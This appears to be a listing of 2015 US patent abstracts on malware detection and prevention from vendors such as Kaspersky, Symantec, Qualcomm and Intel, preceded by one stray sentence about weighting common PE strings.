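Strings such as the DOS stub message appear in nearly every PE and inflate every pairwise score equally; in practice a stop list or an inverse-document-frequency weight over the corpus removes that floor before ranking.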
  • Patent number: 9197656
    Abstract: Preventing execution of viruses or malware on a computing device includes compiling an inventory recordation of legitimate applications and terminating execution of any application not on the inventory recordation while in a protected mode. An instantaneous and unprompted inventory recordation known as a “snapshot” can be performed by the computer program. A user may further train the computer program to identify legitimate applications routinely accessed by the user and to be updated to the inventory recordation, such that the inventory recordation is personal to the user. After training, the protected mode can be activated. A smart icon graphical user interface is utilized, that automatically toggles between locked and unlocked depending on if the computing device is at risk or not, to place the computing device in a protected or unprotected mode.
    Type: Grant
    Filed: February 21, 2014
    Date of Patent: November 24, 2015
    Assignee: VoodooSoft Holdings, LLC
    Inventors: Daniel Earl Butler, E. Dywayne Johnson
  • Patent number: 9191363
    Abstract: Some embodiments provide firewalls and methods for guarding against attacks by leveraging the Document Object Model (DOM). The firewall renders the DOM tree to produce a white-list rendering of the data which presents the non-executable elements of the data and, potentially, outputs of the executable elements of the data without the executable elements that could be used to carry a security threat. Some embodiments provide control over which nodes of the DOM tree are included in producing the white-list rendering. Specifically, a configuration file is specified to white-list various nodes from the DOM tree and the white-list rendering is produced by including the DOM tree nodes that are specified in the white-list of the configuration file while excluding those nodes that are not in the white-list. Some embodiments provide a hybrid firewall that executes a set of black-list rules over white-listed nodes of the DOM tree.
    Type: Grant
    Filed: November 15, 2013
    Date of Patent: November 17, 2015
    Assignee: EDGECAST NETWORKS, INC.
    Inventors: Jayson G. Sakata, Jacqueline Mak, Alexander A. Kazerani
  • Patent number: 9189630
    Abstract: Systems and methods for intercepting computing device system calls for a computing device including a kernel having a system call table. A hypervisor is executed on the computing device, the hypervisor configured to control at least one of the computing device processor registers. At least one modified kernel structure is created, the modified kernel structure including a modified system call table. A memory address of an original system call handler is determined, the original system call handler configured to receive kernel operation commands. A size of a loaded image of the original system call handler is determined. A copy of the original system call handler as a second system call handler is created, and the second system call handler intercepts a computing device system call.
    Type: Grant
    Filed: January 21, 2015
    Date of Patent: November 17, 2015
    Assignee: AO KASPERSKY LAB
    Inventors: Maxim V. Yudin, Alexander S. Tarasenko, Vyacheslav I. Levchenko, Igor Y. Kumagin
  • Patent number: 9189624
    Abstract: Methods, devices and systems for monitoring behaviors of a mobile computing device include observing in a non-master processing core a portion of a mobile device behavior that is relevant to the non-master processing core, generating a behavior signature that describes the observed portion of the mobile device behavior, and sending the generated behavior signature to a master processing core. The master processing core combines two or more behavior signatures received from the non-master processing cores to generate a global behavior vector, which may be used by an analyzer module to determine whether a distributed software application is not benign.
    Type: Grant
    Filed: May 2, 2014
    Date of Patent: November 17, 2015
    Assignee: QUALCOMM Incorporated
    Inventors: Anil Gathala, Rajarshi Gupta
  • Patent number: 9191392
    Abstract: An example embodiment of the present invention provides an apparatus including at least one processor; and at least one memory including executable instructions, the at least one memory and the executable instructions being configured to, in cooperation with the at least one processor, cause the apparatus to perform at least the following: retrieving, from a reputation server, reputation data of uniform resource locators (URLs) of one or more web sites relating to one or more web site features that are available via the web site; and determining executable web site features on the basis of the retrieved reputation data.
    Type: Grant
    Filed: January 7, 2014
    Date of Patent: November 17, 2015
    Assignee: F-Secure Corporation
    Inventor: Jarno Niemelä
  • Patent number: 9191401
    Abstract: Systems and methods for abusive email account detection and transmission of a signed response to an abusive email account owner and provider. The methods include receiving an email from a first email account on a second email account, wherein the email contains malicious content, determining if a trust relationship exists between a first email server corresponding to the first email account and a second email server corresponding to the second email account, and transmitting, using a hardware processor of the second email server, an alert email to the first email account corresponding to the trust relationship, wherein the alert email includes a digital signature and a secure field having an abusive category descriptor in an email header. The secure field may include an abusive category descriptor, for example transmitting spam, transmitting malware, transmitting phishing attempts, and committing fraud.
    Type: Grant
    Filed: June 14, 2013
    Date of Patent: November 17, 2015
    Assignee: PAYPAL, INC.
    Inventors: Brad Wardman, Jeremy D. Pickett, Michael Weideman
  • Patent number: 9185119
    Abstract: The disclosed computer-implemented method for detecting malware using file clustering may include (1) identifying a file with an unknown reputation, (2) identifying at least one file with a known reputation that co-occurs with the unknown file, (3) identifying a malware classification assigned to the known file, (4) determining a probability that the unknown file is of the same classification as the known file, and (5) assigning, based on the probability that the unknown file is of the same classification as the known file, the classification of the known file to the unknown file. Various other methods, systems, and computer-readable media are also disclosed.
    Type: Grant
    Filed: May 8, 2014
    Date of Patent: November 10, 2015
    Assignee: Symantec Corporation
    Inventors: Acar Tamersoy, Kevin A. Roundy, Daniel Marino
  • Patent number: 9183383
    Abstract: Disclosed are systems and methods for limiting the operation of trusted applications in presence of suspicious programs. An example method includes: identifying one or more trusted applications installed on a computer; collecting data about applications and programs installed on the computer; checking for the presence of one or more suspicious programs using suspicious program detection rules, wherein a program is considered to be suspicious when it can access protected information of a trusted application without authorization; and when at least one suspicious program is found, limiting the operation of the trusted application until the suspicious program is terminated or removed from the computer.
    Type: Grant
    Filed: February 17, 2015
    Date of Patent: November 10, 2015
    Assignee: AO Kaspersky Lab
    Inventors: Victor V. Yablokov, Konstantin M. Filatov, Evgeny Y. Eliseev, Roman S. Unuchek
  • Patent number: 9183390
    Abstract: Systems and methods for providing anti-malware protection on storage devices are described. In one embodiment, a storage device includes a controller, firmware, and memory. The firmware communicates with an authorized entity (e.g., external entity, operating system) to establish a secure communication channel. The system includes secure storage to securely store data.
    Type: Grant
    Filed: December 22, 2011
    Date of Patent: November 10, 2015
    Assignee: Intel Corporation
    Inventors: Paul J. Thadikaran, Adam Greer Wright, Thomas R. Bowen, Janet Yabeny Sholar, Reginald D. Nepomuceno, Nicholas D. Triantafillou, Richard Paul Mangold, Darren Lasko, Anand S. Ramalingam, Paritosh Saxena, Unnikrishnan Jayakumar, William B. Lindquist, John A. List
  • Patent number: 9185125
    Abstract: Systems, methods, and computer-readable media for detecting threats on a network. In an embodiment, target network traffic being transmitted between two or more hosts is captured. The target network traffic comprises a plurality of packets, which are assembled into one or more messages. The assembled message(s) may be parsed to generate a semantic model of the target network traffic. The semantic model may comprise representation(s) of operation(s) or event(s) represented by the message(s). Score(s) for the operation(s) or event(s) may be generated using a plurality of scoring algorithms, and potential threats among the operation(s) or event(s) may be identified using the score(s).
    Type: Grant
    Filed: January 9, 2014
    Date of Patent: November 10, 2015
    Assignee: DB NETWORKS, INC.
    Inventors: Eric Varsanyi, David Rosenberg, Chuck Paterson, Steve Schnetzler, Timothy Ruddick
  • Patent number: 9177149
    Abstract: The present invention relates to means for detecting malware. The method is realized on a computer with an operating system (OS) installed thereon, and comprises a step in which a point of interrupt is established when a system call is made by a user application requesting the transfer of control via an address in the kernel of the loaded OS. Next, the data structure of the loaded OS is checked. As this check is carried out, the address of the command in the random-access memory of the computer, by means of which command control will be transferred during the system call, is determined and the addresses of the commands to be executed during the system call are checked to see if they belong to the normal range of addresses of the OS kernel and OS kernel modules in the random-access memory. The presence of malware is then detected in the event that a command address does not belong to the normal range of addresses.
    Type: Grant
    Filed: March 27, 2013
    Date of Patent: November 3, 2015
    Assignee: Joint Stock Company “InfoTeCS”
    Inventors: Konstantin Dmitrievich Olshanov, Evgeny Petrovich Tumoyan, Sergei Nikolaevich Cherementsev
  • Patent number: 9177141
    Abstract: The present invention relates to an active defense method based on cloud security comprising: a client collecting and sending a program behavior launched by a program thereon and/or a program feature of the program launching the program behavior to a server; with respect to the program feature and/or the program behavior sent by the client, the server performing an analysis and comparison in its database, making a determination on the program based on the comparison result, and feeding back to the client; based on the feedback determination result, the client deciding whether to intercept the program behavior, terminate execution of the program and/or clean up the program, and restore the system environment. The invention introduces a cloud security architecture, and employs a behavior feature based on active defense to search and kill a malicious program, thereby ensuring network security.
    Type: Grant
    Filed: August 8, 2011
    Date of Patent: November 3, 2015
    Assignees: BEIJING QIHOO TECHNOLOGY COMPANY LIMITED, QIZHI SOFTWARE (BEIJING) COMPANY LIMITED
    Inventors: Hongyi Zhou, Wenbin Zheng, He Yu, Paul Fan
  • Patent number: 9178905
    Abstract: A security device may receive information identifying a set of conditions for providing countermeasure code to a client device. The security device may receive information identifying an action to be performed when the countermeasure code is executed by the client device, and may determine the countermeasure code to be provided to the client device when the set of conditions is satisfied. The security device may receive a request from the client device, and may determine a response to the request. The response may include response code for serving content of a web page to the client device. The security device may determine that the set of conditions has been satisfied, and may insert the countermeasure code into the response code. The security device may provide the response code and the countermeasure code to the client device, and the countermeasure code may cause the client device to perform the action.
    Type: Grant
    Filed: January 3, 2014
    Date of Patent: November 3, 2015
    Assignee: Juniper Networks, Inc.
    Inventor: Kyle Adams
  • Patent number: 9171154
    Abstract: A computer-implemented method for scanning packed programs in response to detecting suspicious behaviors may include (1) executing a packed program that may include (i) malicious code that has been obfuscated within the packed program and (ii) unpacking code that deobfuscates and executes the malicious code when the packed program is executed, (2) monitoring, while the packed program is executing, how the packed program behaves, (3) detecting, while monitoring how the packed program behaves, a suspicious behavior of the malicious code that indicates that the unpacking code has deobfuscated and executed the malicious code, and (4) performing a security operation on the packed program in response to detecting the suspicious behavior of the malicious code. Various other methods, systems, and computer-readable media are also disclosed.
    Type: Grant
    Filed: February 12, 2014
    Date of Patent: October 27, 2015
    Assignee: Symantec Corporation
    Inventor: Shane Pereira
  • Patent number: 9167003
    Abstract: Devices, systems, and methods are disclosed. An agent resides in a mobile communication device. The agent detects Proximity-based Mobile Malware Propagation. The agent injects one or more trigger network connections in the candidate connection list. These connections appear as legitimate networks and devices, but instead trigger connection to an agent server on a service provider's network. By attempting to connect through the trigger network connection, the malware reveals itself. The system helps collect the malware signature within a short period of time after the malware outbreak in local areas, though such attacks typically bypass network based security inspection in the network.
    Type: Grant
    Filed: June 23, 2014
    Date of Patent: October 20, 2015
    Assignee: AT&T Intellectual Property I, L.P.
    Inventors: Wei Wang, Gang Xu, Gustavo de los Reyes
  • Patent number: 9166998
    Abstract: A method for determining security information of an unknown file in a cloud security system is provided. The method includes: a cloud security serving end receives file security querying information reported by a cloud client end when a preconfigured monitoring point is triggered, wherein the file security querying information comprises identifier information and behavior information of a file; creates a behavior sequence of the file within a lifecycle according to the file security querying information of the file, analyzes the behavior sequence of the file within the lifecycle, and determines file security information of the file according to an analyzed result.
    Type: Grant
    Filed: June 13, 2013
    Date of Patent: October 20, 2015
    Assignee: Tencent Technology (Shenzhen) Company Limited
    Inventor: Yang Chen
  • Patent number: 9166995
    Abstract: A computer-implemented method for using user-input information to identify computer security threats may include (1) detecting activity at a computing system, (2) determining whether a user provided input at the computing system when the activity occurred, (3) determining that the activity indicates a potential security threat based at least in part on whether the user provided input at the computing system when the activity occurred, and (4) performing a security action on the activity in response to the determination that the activity indicates a potential security threat. Various other methods, systems, and computer-readable media are also disclosed.
    Type: Grant
    Filed: September 23, 2013
    Date of Patent: October 20, 2015
    Assignee: Symantec Corporation
    Inventor: Kevin Roundy
  • Patent number: 9165141
    Abstract: Systems and methods for providing features that enable anti-malware protection on storage devices are described. In one embodiment, a storage device includes a controller, firmware, and memory. The controller manages input/output operations for the storage device. The firmware provides features for protection against malware. The memory includes secure storage that is configured to provide a set of storage operations.
    Type: Grant
    Filed: December 22, 2011
    Date of Patent: October 20, 2015
    Assignee: Intel Corporation
    Inventors: Paul J. Thadikaran, Adam Greer Wright, Paritosh Saxena, Nicholas D. Triantafillou, Thomas R. Bowen
  • Patent number: 9158604
    Abstract: Methods and devices for detecting performance-degrading behaviors include identifying a data source component that inputs data into an application executing on a mobile device, and identifying a data sink component that consumes data output from the application. Using a measured runtime control-flow parameter, a likelihood that the data source component is a critical data resource may be determined. Using the probability value, a behavior model that identifies a mobile device feature associated with the critical data resource may be updated and used to determine whether the software application is malicious. Measured runtime control-flow parameters may include a program execution distance between data source and sink components based on heuristics.
    Type: Grant
    Filed: May 13, 2014
    Date of Patent: October 13, 2015
    Assignee: QUALCOMM Incorporated
    Inventors: Mihai Christodorescu, Rajarshi Gupta, David Jerome Fiala
  • Patent number: 9158918
    Abstract: Various embodiments provide methods, apparatus, and computer readable medium for determining a malicious program. In an exemplary method, a specific application programming interface (API) within an application program can be obtained. Call logic for calling the specific API can be determined. The call logic can include a triggering event to trigger the specific API to be called, a feedback path provided after the specific API is called, or a combination thereof. Whether the application program is a malicious program can be determined according to the call logic.
    Type: Grant
    Filed: November 22, 2013
    Date of Patent: October 13, 2015
    Assignee: TENCENT TECHNOLOGY (SHENZHEN) COMPANY LIMITED
    Inventors: Wei Li, Yongliang Tong